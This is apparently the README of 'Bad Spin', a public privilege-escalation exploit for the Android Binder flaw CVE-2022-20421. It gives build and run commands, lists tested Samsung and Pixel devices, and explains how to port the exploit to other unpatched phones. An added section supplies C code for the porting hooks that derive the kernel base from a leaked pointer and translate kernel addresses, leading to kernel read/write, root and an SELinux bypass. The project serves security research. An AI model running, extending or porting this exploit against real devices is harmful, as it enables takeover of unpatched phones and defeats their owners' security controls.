Bad Spin: Android Binder LPE
Author: Moshe Kol
Privilege escalation exploit, launched from the untrusted_app SELinux domain, for the Android Binder vulnerability CVE-2022-20421. The vulnerability was fixed in the Android Security Bulletin of October 2022. The exploit works on devices running kernel versions 5.4.x and 5.10.x and achieves full kernel read/write primitives. On the Google Pixel 6 it additionally obtains full root and bypasses SELinux.
You can find the full write-up here.
Run from shell
- Compile the libbadspin.so library by running make push in the src/ directory. This also pushes the library to /data/local/tmp on the device.
- Run adb shell.
- Run LD_PRELOAD=/data/local/tmp/libbadspin.so sleep 1. This loads the library into the sleep process and starts the exploit.
Note that a process started this way runs in the adb shell's SELinux domain (shell), not in untrusted_app; use the demo app below to exercise the untrusted_app path.
Run from demo app
- Compile libbadspin.so by running make push in the src/ directory. This copies the library to the assets directory of the demo Android app.
- Build the demo Android app in the app/ directory (you might need Android Studio for this).
- Run the app and tap the "Exploit" button.
- Follow the exploit's progress with:
adb logcat -s BADSPIN
Compilation options
You can pass the following variables to make:
- VERBOSE=1 increases log verbosity.
- TEST_VULN=1 only tests whether the device is vulnerable, without proceeding to the full exploit.
Tested devices
$ make list
0: Samsung Galaxy S22, Android 12 (6/2022), kernel 5.10.81
1: Samsung Galaxy S21 Ultra, Android 12 (3/2022), kernel 5.4.129
2: Google Pixel 6, Android 12 (5/2022), kernel 5.10.66
3: Google Pixel 6, Android 13 (9/2022), kernel 5.10.107
Support a new device
It is not difficult to adapt the exploit to a new device.
- Make sure the device runs a 5.4.x or 5.10.x kernel and that its Android security patch level is earlier than October 2022 (the bulletin that fixes CVE-2022-20421).
- Add the device's properties to dev_config.h.
- Provide two function pointers:
  kimg_to_lm(): converts a kernel-image virtual address to its address in the linear mapping.
  find_kbase(): derives the kernel base address from a leaked anon_pipe_buf_ops pointer.
- Compile and run.
If it works for you, please submit a pull request.
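The two device hooks above, as an added example that is not the project's code: a stand-alone C sketch of how find_kbase() and kimg_to_lm() are typically derived on an arm64 kernel, with sanity checks on the leaked pointer so a bad leak is rejected before it is dereferenced (which, per the known issues below, would crash the phone). The struct, its field names and every constant in it (PAGE_OFFSET, PHYS_OFFSET, the kernel load address, the anon_pipe_buf_ops offset, the alignment) are hypothetical placeholders and not the layout of dev_config.h; on a real port the values come from the target's vmlinux / System.map and its memory map.

```c
#include <stdint.h>
#include <stdio.h>

/*
 * Per-device constants. Everything here is a hypothetical placeholder for
 * illustration; it is NOT the project's dev_config.h layout. A real port
 * reads these from the target's vmlinux/System.map and memory map.
 */
struct dev_config_example {
    const char *name;
    uint64_t page_offset;           /* PAGE_OFFSET: start of the linear map (arm64, 39-bit VA assumed) */
    uint64_t phys_offset;           /* PHYS_OFFSET: physical address mapped at PAGE_OFFSET */
    uint64_t kimage_paddr;          /* physical address the kernel image (_text) was loaded at */
    uint64_t kbase_align;           /* alignment the KASLR-slid kernel base must satisfy */
    uint64_t anon_pipe_buf_ops_off; /* anon_pipe_buf_ops - _text, from the symbol table */
};

/* Hypothetical device; all numbers are made up for the example. */
static const struct dev_config_example example_cfg = {
    .name                  = "example-device (hypothetical)",
    .page_offset           = 0xffffff8000000000ULL, /* -(1 << 39) */
    .phys_offset           = 0x80000000ULL,
    .kimage_paddr          = 0x81000000ULL,
    .kbase_align           = 0x200000ULL,           /* 2 MiB */
    .anon_pipe_buf_ops_off = 0x1a2b3c0ULL,
};

/* Lowest address that can be a kernel (TTBR1) pointer on arm64. */
#define KERNEL_VA_MIN 0xffff000000000000ULL

/*
 * find_kbase: recover the runtime (KASLR-slid) kernel text base from a
 * leaked anon_pipe_buf_ops pointer. anon_pipe_buf_ops lives in the kernel
 * image, so base = leak - (symbol offset). Returns 0 when the leak fails
 * the sanity checks, which usually means the leak primitive returned
 * garbage or the offset table belongs to a different kernel build.
 */
static uint64_t find_kbase_example(const struct dev_config_example *cfg,
                                   uint64_t leaked_ptr)
{
    if (leaked_ptr < KERNEL_VA_MIN)             /* not a kernel pointer at all */
        return 0;
    uint64_t kbase = leaked_ptr - cfg->anon_pipe_buf_ops_off;
    if (kbase % cfg->kbase_align != 0)          /* image base is aligned; reject partial leaks */
        return 0;
    if (kbase < cfg->page_offset)               /* image must sit inside kernel VA space */
        return 0;
    return kbase;
}

/*
 * kimg_to_lm: translate a kernel-image virtual address to the linear-map
 * alias of the same physical memory. Two steps, mirroring the kernel's own
 * __pa_symbol() followed by __va(): image VA -> PA using the runtime load
 * address, then PA -> linear-map VA using PHYS_OFFSET/PAGE_OFFSET.
 */
static uint64_t kimg_to_lm_example(const struct dev_config_example *cfg,
                                   uint64_t kbase, uint64_t kimg_va)
{
    uint64_t pa = kimg_va - kbase + cfg->kimage_paddr;
    return pa - cfg->phys_offset + cfg->page_offset;
}

int main(void)
{
    /* Constructed leak: a pointer the exploit would obtain from the freed pipe buffer. */
    uint64_t leaked = 0xffffffd013e2b3c0ULL;
    uint64_t kbase = find_kbase_example(&example_cfg, leaked);
    if (!kbase) {
        fprintf(stderr, "leak failed sanity checks, not continuing\n");
        return 1;
    }
    uint64_t some_kimg_obj = kbase + 0x3000; /* e.g. a global in .data */
    printf("%s: kbase=%#llx  kimg %#llx -> lm %#llx\n", example_cfg.name,
           (unsigned long long)kbase, (unsigned long long)some_kimg_obj,
           (unsigned long long)kimg_to_lm_example(&example_cfg, kbase, some_kimg_obj));
    return 0;
}
```

Rejecting a leak that does not yield an aligned, in-range base is the cheap check worth keeping in a port: a wrong base feeds every later write, and the failure mode on a phone is a reboot rather than an error message.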
Known issues
- The phone might crash on unsuccessful attempts.
- The exploit is unstable in the first few minutes after boot.
- Only works on kernel versions 5.4.x and 5.10.x.
- Only achieves kernel R/W on non-Pixel devices.